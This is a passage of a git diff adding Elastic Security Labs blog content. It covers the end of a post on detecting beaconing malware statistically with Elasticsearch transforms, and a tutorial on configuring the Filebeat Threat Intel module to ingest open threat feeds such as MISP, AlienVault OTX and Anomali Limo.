average rate and the occurrence of one event doesn’t affect the chance of others occurring, then their count in a fixed time interval must be Poisson distributed.\n\nJust to underline this point, it doesn’t matter the underlying mechanisms for that random delay between events (making a coffee, waiting for your software to build, etc.)— if those properties hold, their rate distribution is always the same. Therefore, we expect that the bucket counts to be Poisson distributed for much of the traffic in our network, but not for beacons, which are much more regular. A feature of the Poisson distribution is that its variance is equal to its average, i.e. its RV is 1. Loosely, this means that if the RV of our bucket counts is closer to 0, the signal is more regular than a Poisson process.\n\n[Autocorrelation](https://en.wikipedia.org/wiki/Autocorrelation) is a useful statistic for understanding when a time series repeats itself. The basic idea behind autocorrelation is to compare the time series values to themselves after shifting them in time. Specifically, it is the covariance between the two sets of values (which is larger when they are more similar), normalized by dividing it by the square root of the variances of the two sets, which measures how much the values vary among themselves.\n\nThis process is illustrated schematically below. We apply this to the time series comprising the bucket counts: if the signal is periodic then the time bucketed counts must also repeat themselves. The nice thing about autocorrelation from our perspective is that it is capable of detecting any periodic pattern. For example, the events don’t need to be regularly spaced but might repeat like two events occurring close to one another in time, followed by a long gap and so on.\n\n\n\nWe don’t know the shift beforehand that will maximize the similarity between the two sets of values, so we search over all shifts for the maximum. This, in effect, is the period of the data — the closer its autocorrelation is to one, the closer the time series is to being truly periodic. We threshold the autocorrelation close to one to test for low frequency beacons.\n\nFinally, we noted that most beaconing malware these days incorporates jitter. How does autocorrelation deal with this? Well first off, autocorrelation isn’t a binary measure — it is a sliding scale: the closer the value is to 1 the more similar the two sets of values are to one another. Even if they are not identical but similar it can still be close to one. In fact, we can do better than this by modelling how random jitter affects autocorrelation and undoing its effect. Provided the jitter isn’t too large, the process to do this turns out to be about as complex as just finding the maximum autocorrelation.\n\nIn our implementation, we’ve made the percentage configurable, although one would always use a small-ish percentage to avoid flagging too much traffic as periodic. If you'd like to dig into the gory details of our implementation, all the artifacts are available as a GitHub [release](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) in our detection rules repository.\n\n## **How do we do this using Elasticsearch?**\n\nElasticsearch has some very powerful tools for ad hoc data analysis. The [scripted metric aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-scripted-metric-aggregation.html) is one of them. The nice thing about this aggregation is that it allows you to write custom Painless scripts to derive different metrics about your data. We used the aggregation to script out the beaconing tests.\n\nIn a typical environment, the cardinality of the distinct processes running across endpoints is rather high. Trying to run an aggregation that partitions by every running process is therefore not feasible. This is where another feature of the Elastic Stack comes in handy. A [transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is a complex aggregation which paginates through all your data and writes results to a destination index.\n\nThere are various basic operations available in transforms, one of them being partitioning data at scale. In our case, we partitioned our network event logs by host and process name and ran our scripted metric aggregation against each host-process name pair. The transform also writes out various beaconing related indicators and statistics. A sample document from the resulting destination index is as follows:\n\n\n\nAs you can see, the document contains valuable beaconing-related information about the process. First off, the beacon_stats.is_beaconing indicator says whether or not we found the process to be beaconing. If it is, as in the case above, the document will also contain important metadata, such as the frequency of the beacon. The indicator beacon_stats.periodic says whether or not the signal is a low-frequency beacon, while the indicator beacon_stats.low_count_variation indicates whether or not it is a high-frequency beacon.\n\nFurthermore, the indicators beacon_stats.low_source_bytes_variation and low_destination_bytes_variation indicate whether or not the source and destination bytes sent during the beaconing communication were more or less uniform. Finally, you will also notice the beaconing_score indicator, which is a value from 1-3, representing the number of beaconing tests satisfied by the process for that time period.\n\nWriting such metadata out to an index also means that you can search for different facets of beaconing software in your environment. For example, if you want to search for low frequency beaconing processes in your environment, you would query for documents where the beacon_stats.periodic indicator is true and beacon_stats.low_count_variation is false. You can also build second order analytics on top of the indexed data, such as using [anomaly detection](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html) to find rare beaconing processes, or using a [significant terms aggregation](https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-bucket-significantterms-aggregation.html) to detect lateral movement of beaconing malware in your environment.\n\nFinally, we’ve included several dashboards for your threat hunters and analysts to use for monitoring beaconing activity in your environment. These can be found in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1) as well.\n\n## **Tuning parameters and filtering**\n\nAdvanced users can also tune important parameters to the scripted metric aggregation in the transforms, like jitter percentage, time window, etc. If you'd like to change the default parameters, all you would need to do is delete the transform, change the parameters, and restart it. The parameters you can tune are as follows:\n\n- number_buckets_in_range: The number of time buckets we split the time window into. You need enough to ensure you get reasonable estimates for the various statistics, but too many means the transform will use more memory and compute.\n- time_bucket_length: The length of each time bucket. This controls the time window, so the larger this value the longer the time window. You might set this longer if you want to check for very low frequency beacons.\n- number_destination_ips: The number of destination IPs to gather in the results. Setting this higher increases the transform resource usage.\n- max_beaconing_bytes_cov: The maximum coefficient of variation in the payload bytes for the low source and destination bytes variance test. Setting this higher will increase the chance of detecting traffic as beaconing, so would likely increase [recall](https://en.wikipedia.org/wiki/Precision_and_recall) for malicious C2 beacons. However, it will also reduce the [precision](https://en.wikipedia.org/wiki/Precision_and_recall) of the test.\n- max_beaconing_count_rv: The maximum relative variance in the bucket counts for the high frequency beacon test. As with max_beaconing_bytes_cov, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.\n- truncate_at: The lower and upper fraction of bucket values discarded when computing max_beaconing_bytes_cov and max_beaconing_count_rv. This allows you to ignore occasional changes in traffic patterns. However, if you retain too small a fraction of the data, these tests will be unreliable.\n- min_beaconing_count_autocovariance: The minimum autocorrelation of the signal for the low frequency beacon test. Lowering this value will likely result in an increase in recall for malicious C2 beacons, at the cost of reduced test precision. As with some of the other parameters mentioned above, we suggest tuning this parameter based on the kind of tradeoff you want between precision and recall.\n- max_jitter: The maximum amount by which we assume that a periodic beacon is jittered, as a fraction of its period.\n\nYou can also make changes to the transform query. We currently look for beaconing activity over a 6h time range, but you can change this to a different time range. As mentioned previously, beaconing is not a characteristic specific to malware and a lot of legitimate, benign processes also exhibit beaconing-like activity.\n\nIn order to curb the false positive rate, we have included a starter list of filters in the transform query to exclude known benign beaconing processes that we observed during testing, and a list of IPs that fall into two categories:\n\n1. The source IP is local and the destination is remote\n2. For certain Microsoft processes, the destination IP is in a Microsoft block\n\nYou can add to this list based on what you see in your environment.\n\n## **Evaluation**\n\nIn order to measure the effectiveness of our framework as a reduced search space for beaconing activity, we wanted to test two aspects:\n\n1. Does the framework flag actual malicious beaconing activity?\n2. By how much does the framework reduce the search space for malicious beacons?\n\nIn order to test the performance on malware beacons, we ran the transform on some synthetic data as well as some real malware! We set up test ranges for Emotet and Koadic, and also tested it on NOBELIUM logs we had from several months ago. The results from the real malware tests are worth mentioning here.\n\n\n\nFor NOBELIUM, the beaconing transform catches the offending process, rundll32.exe, as well as the two destination IPs, 192.99.221.77 and 83.171.237.173, which were among the main IoCs for NOBELIUM.\n\nFor Koadic and Emotet as well, the transform was able to flag the process as well as the known destination IPs on which the test C2 listeners were running. The characteristics of each of the beacons were different. For example, Koadic was a straightforward, high-frequency beacon that satisfied all the beaconing criteria being checked in the transform i.e. periodicity, as well as low variation of source and destination bytes. Emotet was slightly trickier since it was a low frequency beacon with a high jitter percentage. But we were able to detect it due to the low variation in the source bytes of the beacon.\n\nTo test the amount of reduction in search space, we ran the transform over three weeks on an internal cluster that was receiving network event logs from ~ 2k hosts during the testing period. We measured the reduction in search space based on the number of network event log messages, processes, and hosts an analyst or threat hunter would have to sift through before and after running the transform, in order to identify malicious beacons. The numbers are as follows:\n\n\n\nWhile the reduction in search space is obvious, another point to note is the scale of data that the transforms are able to churn through comfortably, which becomes an important aspect to consider, especially in production environments. Additionally, we have also released dashboards (available in the [release package](https://github.com/elastic/detection-rules/releases/tag/ML-Beaconing-20211216-1)), which track metrics like prevalence of the beaconing processes, etc. that can help make informed decisions about further filtering of the search space.\n\nWhile the released dashboards, and the statistics in the above table are based on cases where the beacon_stats.is_beaconing indicator is true i.e. beacons that satisfy either of the beaconing tests, threat hunters may want to further streamline their search by starting with the most obvious beaconing-like cases and then moving on to the less obvious ones. This can be done by filtering and searching by the beacon_stats.beaconing_score indicator instead of beacon_stats.is_beaconing, where a score of 3 indicates a typical beacon (satisfying tests for periodicity as well as low variation in packet bytes), and score of 1 indicates a less obvious beacon (satisfying only one of the three tests).\n\nFor reference, we observed the following on our internal cluster:\n\n\n\n## What's next\n\nWe’d love for you to try out our beaconing identification framework and give us feedback as we work on improving it. If you run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack), [discussion forums](https://discuss.elastic.co/c/security), or even our [open detections repository](https://github.com/elastic/detection-rules). Stay tuned for Part 2 of this blog, where we’ll cover going from identifying beaconing activity to actually detecting on malicious beacons!\n\nTry out our beaconing identification framework with a [free 14-day trial](https://cloud.elastic.co/registration) of Elastic Cloud.\n"
+ },
+ "title": "Identifying beaconing malware using Elastic",
+ "slug": "identifying-beaconing-malware-using-elastic",
+ "date": "2023-03-01",
+ "description": "In this blog, we walk users through identifying beaconing malware in their environment using our beaconing identification framework.",
+ "author": [
+ {
+ "slug": "apoorva-joshi"
+ },
+ {
+ "slug": "thomas-veasey"
+ },
+ {
+ "slug": "craig-chamberlain"
+ }
+ ],
+ "image": "blog-thumbnail-securitymaze.jpg",
+ "category": [
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-identifying_beaconing_malware_using_elastic-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json
new file mode 100644
index 00000000000..9353b8c5328
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ingesting threat data with the Threat Intel Filebeat module\"\nslug: \"ingesting-threat-data-with-the-threat-intel-filebeat-module\"\ndate: \"2023-03-01\"\ndescription: \"Tutorial that walks through setting up Filebeat to push threat intelligence feeds into your Elastic Stack.\"\nauthor:\n - slug: andrew-pease\n - slug: marius-iversen\nimage: \"photo-edited-12-t.jpg\"\ncategory:\n - slug: security-operations\n - slug: detection-science\ntags:\n - tutorial\n - filebeat\n - threat intel\n---\n\nThe ability for security teams to integrate threat data into their operations substantially helps their organization identify potentially malicious endpoint and network events using indicators identified by other threat research teams. In this blog, we’ll cover how to ingest threat data with the Threat Intel Filebeat module. In future blog posts, we’ll cover enriching threat data with the Threat ECS fieldset and operationalizing threat data with Elastic Security.\n\n## Elastic Filebeat modules\n\nElastic Filebeat modules simplify the collection, parsing, and visualization of data stored in common log formats. Elastic publishes a variety of [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that are focused on collecting the data you want for use within Elasticsearch. These modules provide a standardized and “turnkey” method to ingest specific data sources into the Elastic Stack.\n\nUsing these capabilities, the Threat Intel Filebeat module:\n\n- Consumes threat data from six open source feeds\n- Loads threat data into Elasticsearch\n- Normalizes threat data into the [Threat ECS fieldset](https://www.elastic.co/guide/en/ecs/current/ecs-threat.html)\n- Enables threat analysis through dashboards and visualizations\n\nAnalysts and threat hunters can use this data for raw threat hunting, enrichment, intelligence analysis and production, and detection logic.\n\n:\n\n- [Abuse.ch Malware](https://urlhaus-api.abuse.ch/v1/payloads/recent)\n- [Abuse.ch URL](https://urlhaus.abuse.ch/)\n- [AlienVault Open Threat Exchange (OTX)](https://otx.alienvault.com/)\n- [Anomali Limo](https://www.anomali.com/resources/limo)\n- [Malware Bazaar](https://bazaar.abuse.ch/)\n- [Malware Information Sharing Platform (MISP)](https://www.misp-project.org/)\n\nUsing the Threat Intel Filebeat module, you can choose from several open source threat feeds, store the data in Elasticsearch, and leverage the Kibana Security App to aid in security operations and intelligence analysis.\n\n## Threat Intel Filebeat module\n\nGenerally, the Filebeat Threat Intel module can be started without any configuration to collect logs from Abuse.ch feeds, Anomali Limo, and Malware Bazaar. However, the optional AlienVault OTX and MISP datasets require tokens to authenticate to their feed sources. Thankfully, obtaining a token is a simple process.\n\n### AlienVault OTX\n\nThe team over at Alien Labs® has created the Open Threat Exchange (OTX)® as an open threat intelligence community. This environment provides access to a diverse community of researchers and practitioners. OTX allows anyone in the community to discuss, research, validate, and share threat data. Additionally, OTX has an Application Programming Interface (API) endpoint that provides a read-only feed; which is how the Filebeat module consumes the OTX threat data.\n\nTo access the OTX API, you simply need to [create an account](https://otx.alienvault.com/). Once you have an account, you can subscribe to specific OTX community reports and threat data feeds called “Pulses.” These Pulses are retrieved by the Filebeat module and stored in Elasticsearch.\n\nPulses are updated at various cadences, but many are daily or even hourly. The Pulse has a summary of the threat, indicators, and various other enrichments that can help you contextually assess the threat in your environment.\n\nTo subscribe to Pulses, select Browse → Pulses, and then subscribe to any Pulses that you’d like. You can sort by the most recently modified to identify the most active Pulses.\n\n\n\nNow that you’ve subscribed to Pulses of interest, we’ll need to collect your API key.\n\n### Retrieving Your API Key\n\nThe API key is used to securely authenticate to OTX and obtain the indicators from Pulses.\n\nTo retrieve your API key, select your userID → Settings, and then copy your OTX Key.\n\n\n\nNow that we have your OTX Key, let’s set up MISP.\n\n## MISP\n\nThe Malware Information Sharing Platform (MISP) is an open source project for collecting, storing, distributing, and sharing indicators about threats.\n\nWhile MISP is extremely powerful and has a tremendous variety of features, it can be a bit cumbersome to set up. If you are planning on setting up MISP for production, check out the [official documentation](https://github.com/MISP/MISP/tree/2.4/docs) for installing MISP on Kali, RHEL (incl. CentOS and Fedora), or Ubuntu.\n\nIf your organization doesn’t have a MISP instance, you can use one of the many projects that use Docker to get MISP up and running. There’s a [great and maintained project](https://github.com/coolacid/docker-misp) by Jason Kendall (@coolacid) that is about as turnkey as you could ask for.\n\n### Standing up CoolAcid’s MISP Docker Containers\n\nAs a caveat, this will cover a default development deployment of MISP. It should not be used in production. Please see the [official MISP documentation](https://github.com/MISP/MISP/tree/2.4/docs) for properly deploying a secure MISP instance.\n\nAs a few prerequisites, you’ll need to have Docker Compose and Git installed:\n\n- **Docker Compose** is used to automate the deployment and configuration of the containers. You can check out [Docker’s documentation](https://docs.docker.com/compose/install/) on getting Compose installed.\n- **Git** is a version-control framework used to coordinate software development throughout contributors and community members. You can check out the [Git documentation](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git) on getting Git installed.\n\nNext, we need to clone CoolAcid’s repository and fire up the containers.\n\n- git clone: Copies the remote repository to your local machine into a file called “docker-misp”\n- cd docker-misp: Changes into the “docker-misp” directory\n- docker-compose up -d: Uses the docker-compose file in the “docker-misp” directory to download, build, and start all of the relevant containers in “detached mode” (in the background)\n\n```\nCode Block 1 - Starting MISP Containers\n\n$ git clone https://github.com/coolacid/docker-misp.git\n$ cd docker-misp\n$ docker-compose up -d\n\nPulling misp (coolacid/misp-docker:core-latest)...\ncore-latest: Pulling from coolacid/misp-docker\na54cbf64e415: Pull complete\n84e78d2508ee: Pull complete\n433476aac54e: Pull complete\n780a2dfa04f6: Pull complete\nDigest: sha256:7f380ad0d858bdec2c4e220f612d80431b1a0b0cb591311ade38da53b50a4cc1\nStatus: Downloaded newer image for coolacid/misp-docker:core-latest\nPulling misp-modules (coolacid/misp-docker:modules-latest)...\nmodules-latest: Pulling from coolacid/misp-docker\ncdd040608d7b: Pull complete\n4e340668f524: Pull complete\na4501f203bb2: Downloading [=========================================> ] 166.1MB/201.3MB\n2cdaa3afcfca: Download complete\n99a18a4e84d6: Downloading [=============================> ] 130.8MB/218.3MB\n...\n\n```\n\nOnce all of the containers are started, simply browse to [https://localhost](https://localhost:8080) and log in with the default credentials of admin@admin.test and a passphrase of admin. You will immediately be required to change your passphrase.\n\n### Configuring default MISP feeds\n\nOnce you have started the MISP containers and changed your default credentials, hover over Sync Actions and then select List Feeds.\n\n\n\nHighlight the available feeds, select “Enable selected” to enable the default feeds, and then “Fetch and store all feed data.”\n\n\n\nNext, select on the “Event Actions” menu item, select “List Events” and you’ll see data begin to be populated. This will take a while.\n\n\n\nWhile the data provided by the MISP threat feeds is being downloaded, let’s get your API key.\n\n### Collecting Your API Key\n\nTo collect your API key, select “Administration” and then “List Users.” You will see your account. Next to your “Authkey” will be an eye icon, select it to show your API key and copy that down.\n\n\n\nNow that we have set up and configured MISP and retrieved our API key, we can configure the actual Filebeat module.\n\n## Installing Filebeat\n\nGetting the Threat Intel module is no different than any other Filebeat module. Check out the [Quick Start guide to install Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html) either as a standalone binary or a package for macOS, Windows, or Linux.\n\n## Configuring the Threat Intel Filebeat module\n\nOnce you have Filebeat, we’ll simply enable the module (ensure filebeat is in your $PATH).\n\n```\nCode Block 2 - Enabling the Threat Intel Filebeat Module\n\nfilebeat modules enable threatintel\n```\n\nNext, let’s configure feeds. We’ll do this by modifying the module configuration files. Depending on your OS and installation method, the configuration files will be located in different locations:\n\nWindows\n\n- C:\\Program Files\\Filebeat\\modules.d\\threatintel.yml\n- If installed with [Chocolatey](https://community.chocolatey.org/packages/filebeat)\n- C:\\ProgramData\\chocolatey\\lib\\filebeat\\tools\\modules.d\\threatintel.yml\n\nmacOS\n\n- filebeat/modules.d/threatintel.yml\n- If installed with [Homebrew](https://formulae.brew.sh/formula/filebeat)\n- /usr/local/etc/filebeat/modules.d/threatintel.yml\n\nLinux\n\n- filebeat/modules.d/threatintel.yml\n- If Installed with [APT](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_apt) or [YUM / dnf](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html#_yum)\n- /etc/filebeat/modules.d/threatintel.yml\n\nUsing whichever text editor you’re most comfortable with, open threatintel.yml and we’ll add your OTX API key, your MISP API key, and validate Anomali’s credential pair.\n\n### Abuse URL feed configuration\n\nBy default, the Abuse URL feed is enabled and does not need modification. The feed includes domain, URI, and URL indicators with additional context for significant dates, tags, submitter, status, etc.\n\n```\nCode Block 3 - Configuring the Abuse URL Feed\n\nabuseurl:\n enabled: true\n\n # Input used for ingesting threat intel data.\n var.input: httpjson\n\n # The URL used for Threat Intel API calls.\n var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/\n\n # The interval to poll the API for updates.\n var.interval: 10m\n```\n\n#### Abuse malware feed configuration\n\nBy default, the Abuse malware feed is enabled and does not need modification. The feed includes file hashes and hosts with additional context for significant dates, tags, status, etc.\n\n```\nCode Block 4 - Configuring the Abuse Malware Feed\n\nabusemalware:\n enabled: true\n\n # Input used for ingesting threat intel data.\n var.input: httpjson\n\n # The URL used for Threat Intel API calls.\n var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/\n\n # The interval to poll the API for updates.\n var.interval: 10m\n```\n\n### MISP feed configuration\n\nBy default, the MISP feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, status, submitter, etc.\n\nThe API endpoint that Filebeat will query needs to be configured. If you are running MISP on the same system as Filebeat, you can use var.url: https://localhost/event/restSearch. If you are running MISP elsewhere, you’ll need to enter that hostname or IP address in lieu of localhost.\n\nThe API token is the “Authkey” that you retrieved during the previous MISP setup steps. You’ll enter that as the value for var.api_token:\n\nIf you are using a self-signed SSL certificate for MISP, you’ll want to disable the SSL verification mode by uncommenting the var.ssl.verification_mode: none line.\n\n```\nCode Block 5 - Configuring the MISP Feed\n\nmisp:\n enabled: true\n\n # Input used for ingesting threat intel data, defaults to JSON.\n var.input: httpjson\n\n # The URL of the MISP instance, should end with \"/events/restSearch\".\n var.url: https://localhost/events/restSearch\n\n # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI.\n var.api_token: MISP-Authkey\n\n # Configures the type of SSL verification done, if MISP is running on self signed certificates\n # then the certificate would either need to be trusted, or verification_mode set to none.\n var.ssl.verification_mode: none\n\n # Optional filters that can be applied to the API for filtering out results. This should support the majority of\n # fields in a MISP context. For examples please reference the filebeat module documentation.\n #var.filters:\n # - threat_level: [4, 5]\n # - to_ids: true\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request\n # afterwards will filter on any event newer than the last event that was already ingested.\n var.first_interval: 300h\n\n # The interval to poll the API for updates.\n var.interval: 5m\n```\n\n### AlienVault OTX feed configuration\n\nBy default, the AlienVault OTX feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.\n\nThe API token is the “OTX Key” that you retrieved during the AlienVault OTX setup steps. You’ll enter that as the value for var.api_token:\n\n```\nCode Block 6 - Configuring the AlienVault OTX Feed\n\notx:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for OTX Threat Intel API calls.\n var.url: https://otx.alienvault.com/api/v1/indicators/export\n\n # The authentication token used to contact the OTX API, can be found on the OTX UI.\n Var.api_token: OTX-Key\n\n # Optional filters that can be applied to retrieve only specific indicators.\n #var.types: \"domain,IPv4,hostname,url,FileHash-SHA256\"\n\n # The timeout of the HTTP client connecting to the OTX API\n #var.http_client_timeout: 120s\n\n # How many hours to look back for each request, should be close to the configured interval.\n # Deduplication of events is handled by the module.\n var.lookback_range: 1h\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n```\n\n### Anomali feed configuration\n\nBy default, the Anomali feed is enabled but requires configuration. The feed includes various file and network data with additional context for significant dates, tags, etc.\n\nThe default username and passphrase for the Limo feed is guest:guest, but are commented out. If you do not have other credential pairs, you can simply uncomment var.username and var.password.\n\nAt the time of this writing, Anomali has 11 collections that they provide as part of their Limo feed. The var.url variable is where the collection is defined. To get a list of the collections, you can query the Anomali Limo collections API endpoint (while not required, [jq](https://stedolan.github.io/jq/download/) makes the collections easier to read).\n\n```\nCode Block 7 - Configuring the Anomali Limo Collections\n\n$ curl -L -u guest:guest https://limo.anomali.com/api/v1/taxii2/feeds/collections | jq\n\n{\n \"collections\": [\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"107\",\n \"title\": \"Phish Tank\"\n },\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"135\",\n \"title\": \"Abuse.ch Ransomware IPs\"\n },\n {\n \"can_read\": true,\n \"can_write\": false,\n \"description\": \"\",\n \"id\": \"136\",\n \"title\": \"Abuse.ch Ransomware Domains\"\n },\n...\n```\n\nThe collection ID can be inserted into the Anomali configuration. There are a few ways to do this. You can:\n\n- Manually change the ID\n- Enter all of the IDs and comment out all but the collection you’re wanting to target\n- Create a duplicate Anomali configuration section for each collection\n\nThe below example shows the approach of duplicate sections for each collection; notice the different collection ID for each section (31, 313, 33) in the var.url: field.\n\n```\nCode Block 8 - Configuring the Anomali Limo Feed\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/31/objects\n\n # The Username used by anomali Limo, defaults to guest.\n var.username: guest\n\n # The password used by anomali Limo, defaults to guest.\n var.password: guest\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/313/objects\n\n # The Username used by anomali Limo, defaults to guest.\n var.username: guest\n\n # The password used by anomali Limo, defaults to guest.\n var.password: guest\n\n # How far back to look once the beat starts up for the first time, the value has to be in hours.\n var.first_interval: 400h\n\n # The interval to poll the API for updates\n var.interval: 5m\n\n anomali:\n enabled: true\n\n # Input used for ingesting threat intel data\n var.input: httpjson\n\n # The URL used for Threat Intel API calls. Limo has multiple different possibilities for URL's depending\n # on the type of threat intel source that is needed.\n var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/33/objects\n...\n\n```\n\nNow that we’ve configured the module to consume threat feed data, let’s send the data into Elasticsearch and visualize it with Kibana.\n\n## Setting up Elasticsearch and Kibana\n\nThe Filebeat Threat Intel module will send the configured threat feed data into Elasticsearch, which can be visualized with Kibana. Please see the Elastic documentation for setting up [Elasticsearch](https://www.elastic.co/guide/en/elasticsearch/reference/current/setup.html) and [Kibana](https://www.elastic.co/guide/en/kibana/current/setup.html) production environments. Additionally, if you’re looking for a turnkey approach, you can quickly and securely set up an [Elastic Cloud](https://cloud.elastic.co) account.\n\nFor this non-production example, we’ll be using one of the many projects that use Docker to get Elasticsearch and Kibana up and running quickly.\n\n### Standing up an Elasticsearch and Kibana container\n\nAs a caveat, this will cover a convenient default development deployment of Elasticsearch and Kibana. It should not be used in production. Please see the [Elastic documentation](https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-stack-security.html) for properly deploying a secure instance.\n\nWe’ll simply collect the repository and start the Docker containers.\n\n- git clone: This copies the remote repository to your local machine into a folder called “elastic-container”\n- cd elastic-container: Changes into the “elastic-container” directory\n- sh elastic-container.sh start: This downloads and starts the Elasticsearch and Kibana containers\n\n```\nCode Block 9 - Starting Elastic Containers\n\n$ git clone https://github.com/peasead/elastic-container.git\n$ cd elastic-container\n$ sh elastic-container.sh start\n\n7.12.1: Pulling from elasticsearch/elasticsearch\nddf49b9115d7: Already exists\n4df4d6995ad2: Pull complete\ne180ce5d1430: Pull complete\nb3801a448e4f: Downloading [====> ] 199.3MB/353.1MB\na3100bfb487c: Download complete\n817ce7c869c7: Download complete\n485f138f2280: Download complete\n\n7.12.1: Pulling from kibana/kibana\nddf49b9115d7: Already exists\n588c50b1b6af: Extracting [====================> ] 34.93MB/40.52MB\n9d32826b6fa0: Download complete\n01017880c9d9: Download complete\nefcedd43b7be: Download complete\n0887ad2a14e0: Download complete\n625b277c1f7b: Downloading [=====> ] 52.27MB/320.4MB\n68815bc8856d: Download complete\ne9e0d8f8fa8c: Download complete\n```\n\nCheck out the repository [documentation](https://github.com/peasead/elastic-container) for additional usage and configuration options (if needed).\n\nOnce all of the containers are started, simply browse to [http://localhost:5601](https://localhost:5601) and log in with the default credentials of elastic and a passphrase of password.\n\n## Consuming threat data with Filebeat\n\nThere are multiple [output options for Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/configuring-output.html), so use whatever is easiest for you. We’ll use a local Elasticsearch instance in this example. Using a local instance of Elasticsearch and Kibana requires no modification to the filebeat.yml file.\n\nTo validate our configuration, let’s first test our configuration and access to Elasticsearch.\n\n- filebeat test config: This will test to ensure your filebeat.yml configuration is correct (if you modified it to fit your environment)\n- filebeat test output - this will test to ensure you can access Elasticsearch\n\n```\nCode Block 10 - Testing Filebeat Configuration and Connection\n\n$ filebeat test config\nConfig OK\n\n$ filebeat test output\nelasticsearch: http://localhost:9200...\n parse url... OK\n connection...\n parse host... OK\n dns lookup... OK\n addresses: ::1, 127.0.0.1\n dial up... OK\n TLS... WARN secure connection disabled\n talk to server... OK\n version: 7.12.0\n```\n\nTo load the dashboards, index pattern, and ingest pipelines, let’s run the setup.\n\n- filebeat setup: This will connect to Kibana and load the index pattern, ingest pipelines, and the saved objects (tags, visualizations, and dashboards)\n\n```\nCode Block 11 - Setting Up Filebeat Index Patterns and saved objects in Kibana\n\n$ filebeat setup\n\nOverwriting ILM policy is disabled. Set `setup.ilm.overwrite: true` for enabling.\n\nIndex setup finished.\nLoading dashboards (Kibana must be running and reachable)\nLoaded dashboards\nSetting up ML using setup --machine-learning is going to be removed in 8.0.0. Please use the ML app instead.\nSee more: https://www.elastic.co/guide/en/machine-learning/current/index.html\nLoaded machine learning job configurations\nLoaded Ingest pipelines\n\n```\n\nFinally, let’s [start Filebeat](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-starting.html) to begin collecting!\n\nNext, browse to Kibana and select the Dashboards app. To make the dashboards easier to find, they all use the “threat intel” tag.\n\n\n\nThere is a dashboard for each feed and an overview dashboard that shows the health of the module.\n\n and adding [drilldown](https://www.elastic.co/guide/en/kibana/current/drilldowns.html) capabilities to each visualization.\n\nAdditionally, as we mentioned in the beginning of this post, this is part one of a three-part series on operationalizing threat data in the Elastic Stack. The next post will cover enhancements to the Threat ECS fieldset and enriching threat data using local endpoint and network observations.\n\nWe’re working on adding additional open source and commercial feeds. If you have feeds that you’d like to see prioritized, please check out the contribution section below.\n\nFinally, we’re looking at opportunities to add context and enrichments to observed events with third-party sources.\n\nSo stay tuned — we’re continuing to lean hard into empowering our customers to defend their environments. Being able to action threat data is a key part of that journey.\n\n## How can you contribute?\n\nThe [Threat Intel Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html) was released with Elastic 7.12, which means that it is still in beta. Testing the feeds, configurations, visualizations, etc. is strongly encouraged. We love hearing feedback.\n\nIn addition to the Threat Intel module, there are some other repositories that are related to the collection, processing, and analysis of TI data:\n\n- The Beats [repository](https://github.com/elastic/beats), where you can contribute to, and enhance, threat data feeds\n- The Elastic Common Schema (ECS) [repository](https://github.com/elastic/ecs), where you can be a part of the discussion on shaping how threat data is described in the Elastic Stack\n- The Kibana [repository](https://github.com/elastic/kibana), where analysts interact with the data stored in Elasticsearch\n- The Detection Rules [repository](https://github.com/elastic/detection-rules), where detection logic and rules are created and stored\n\nThe best way to contribute to the community is to explore the functionality, features, and [documentation](https://www.elastic.co/guide/en/beats/filebeat/7.12/filebeat-module-threatintel.html) and let us know through a [Github Issue](https://github.com/elastic/beats/issues/new/choose) if there is a problem or something you’d like to see.\n\nIf you’re new to 